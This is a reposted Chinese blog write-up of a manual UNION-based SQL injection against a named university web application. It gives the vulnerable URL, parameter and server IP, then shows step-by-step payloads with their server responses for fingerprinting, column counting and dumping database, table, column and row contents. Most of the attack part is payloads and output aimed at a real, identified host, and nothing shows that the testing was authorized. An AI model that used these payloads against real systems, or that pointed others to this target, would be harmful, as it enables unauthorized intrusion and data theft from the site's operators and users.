记一次MySQL手工注入案例
来源:互联网 发布:上古卷轴5精灵捏脸数据 编辑:程序博客网 时间:2024/05/22 18:23
记录一次手动注入学校某站MySQL的过程
信息收集
发现方式
子域名扫描 -> 导入awvs -> 批量扫blind-injection
url
http://home.bjtu.edu.cn/
info(whatweb)
- 202.112.147.124(学校内网)
- Apache/2.4.9
- Win64
- PHP/5.5.12
parameter
http://home.bjtu.edu.cn/ctrl/vote/ajax_vote_response.php?req=3&tid=1
- tid (GET)
测试
确认注入 =>tid
分号报错,有回显: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 6
判断版本 >4.0
and ord(mid(version(),1,1))>51
返回正常,说明版本>4.0,支持union
查字段数 =>5
order by+二分法
tid=1 and order by 6
=> Unknown column ‘6’ in ‘order clause’tid=1 and order by 5
=> [{“item_title”:”3”,”item_id”:”3”,”item_count”:36},{“item_title”:”4”,”item_id”:”4”,”item_count”:22},{“item_title”:”5”,”item_id”:”5”,”item_count”:66},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b92”,”item_id”:”2”,”item_count”:84},{“item_title”:”\u5b66\u4e60\u8bdd\u98981-\u89c2\u70b9\u4e00”,”item_id”:”1”,”item_count”:103}]
union+select
tid=1 and 1=2 union select 1,2,3,4,5...,n
- 错误输出:
The used SELECT statements have a different number of columns
- 正确输出:
[{"item_title":"2","item_id":"1","item_count":4}]
信息收集
and 1=2 union select [function],-1,-1,-1,-1
- version() 查询数据库版本=>5.6.17
- database() 查询当前连接的数据库=>stu
- @@version_compile_os 查询当前操作系统=>Win64
- @@datadir 查询读取数据库路径=>c:\wamp\bin\mysql\mysql5.6.17\data\
- @@basedir 查询MYSQL安装路径
获取所有库名
in
select * from stu where tid=1 and 1=2 union select SCHEMA_NAME,-1,-1,-1,-1 from information_schema.columns;或者:select * from stu where tid=1 and 1=2 union select table_schema,-1,-1,-1,-1 from information_schema.columns;
out
[{"item_title":"-1","item_id":"information_schema","item_count":-1},{"item_title":"-1","item_id":"mysql","item_count":-1},{"item_title":"-1","item_id":"performance_schema","item_count":-1},{"item_title":"-1","item_id":"stu","item_count":-1},{"item_title":"-1","item_id":"student","item_count":-1}]
获取stu中的表名
in(含处理输出格式)
select * from stu where tid=1 and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-1,-1 from information_schema.columns where table_schema="stu";
out
[{"item_title":"-1","item_id":"[xxoo]fsa_about,fsa_contest_and_project,fsa_css3_example,fsa_nav_feedback,fsa_nav_feedback_type,fsa_nav_list,fsa_nav_page_list,fsa_nav_page_list_1,fsa_nav_page_list_395,fsa_nav_page_list_396,fsa_nav_page_list_398,fsa_nav_page_list_399,fsa_nav_page_list_400,fsa_nav_page_list_401,fsa_nav_page_list_402,fsa_nav_page_list_403,fsa_nav_page_list_404,fsa_nav_...[xxoo]","item_count":-1}]
获取fsa_vote_topic中的列名
in
and 1=2 union select concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT column_name),0x5B78786F6F5D),-1,-1,-1,-1 from information_schema.columns where table_name='fsa_vote_topic'
out
{"item_title":"-1","item_id":"[xxoo]topic_id,topic_title,topic_type_id[xxoo]","item_count":-1}]
确定字段数
in
and 1=2 union select concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic
out
[{"item_title":"-1","item_id":"[xxoo]12[xxoo]","item_count":-1}]
获取字段值
in
依次改变limit值可爆出多列内容
and 1=0 union select concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D),-1,-1,-1,-1 from fsa_vote_topic LIMIT 0,1
out
[{"item_title":"-1","item_id":"[xxoo]\u5b66\u4e60\u8bdd\u98981[xxoo]","item_count":-1}]
解码后为=> 学习话题1
注意
在写payload时,特别注意函数中的参数不用加引号,而使用等号赋值时需要加引号.
不加的情况(topic_title)(fsa_vote_topic): concat(0x5B78786F6F5D,topic_title,0x5B78786F6F5D)
from fsa_vote_topic LIMIT 0,1
加的情况(有等号赋值时) here table_name='fsa_vote_topic'
- 记一次MySQL手工注入案例
- 记一次有意义的asp手工注入
- asp+Access手工注入案例
- MYSQL手工注入语句
- mysql -- 手工注入
- mysql -- 手工注入
- PHP+MySQL手工注入
- ACCESS+MYSQL手工注入
- MYSQL手工注入
- mysql手工注入
- PHP+MySQL 手工注入语句
- MYSQL手工注入_复习
- MYSQL手工注入入门示例
- mysql 手工注入 字符类型
- MySQL 手工注入常用语句
- 记一次mysql注入漏洞修复
- PHP+MySQL手工注入语句大全
- SQL手工注入基础详解---- MySQL篇
- 11.29总结
- Contains Duplicate
- Java中PreparedStatement和Statement的用法区别
- android源码分析之类Build
- Hibernate配置过程发生的问题及解决方法
- 记一次MySQL手工注入案例
- OpenGL概述
- Hive开发人员如何提升?
- 数据库使用总结 Sql sever ,mysql,sqlite
- ROS新手教程【一】ROS开源机器人操作系统简介
- GBDT(MART) 迭代决策树入门教程 | 简介
- 浅谈const,static,extern
- 对服务器开发的误解
- Android开源特效框架